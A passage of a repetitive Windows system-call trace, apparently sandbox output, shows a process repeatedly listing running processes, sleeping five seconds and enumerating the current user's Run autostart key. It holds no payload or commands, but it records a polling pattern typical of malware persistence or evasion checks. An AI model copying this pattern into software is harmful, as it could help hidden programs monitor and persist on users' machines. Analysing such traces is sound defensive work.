RegionSize=0x14e638*=0x10000) returned 0x0 [0179.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.830] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.837] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.837] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.837] NtClose (Handle=0x154) returned 0x0 [0179.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.842] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.854] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.854] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.854] NtClose (Handle=0x154) returned 0x0 [0179.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.857] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.869] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.869] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.869] NtClose (Handle=0x154) returned 0x0 [0179.869] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.874] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.885] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.885] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.885] NtClose (Handle=0x154) returned 0x0 [0179.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.889] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.890] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.900] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.900] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.900] NtClose (Handle=0x154) returned 0x0 [0179.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.905] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.915] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.915] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.915] NtClose (Handle=0x154) returned 0x0 [0179.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.919] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.931] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.931] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.931] NtClose (Handle=0x154) returned 0x0 [0179.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.936] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.946] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.946] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.946] NtClose (Handle=0x154) returned 0x0 [0179.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.950] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.963] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.963] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.963] NtClose (Handle=0x154) returned 0x0 [0179.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.970] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.978] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.978] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.978] NtClose (Handle=0x154) returned 0x0 [0179.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.982] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.993] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.993] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.993] NtClose (Handle=0x154) returned 0x0 [0179.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.999] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.010] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.010] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.010] NtClose (Handle=0x154) returned 0x0 [0180.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.014] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.024] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.024] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.024] NtClose (Handle=0x154) returned 0x0 [0180.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 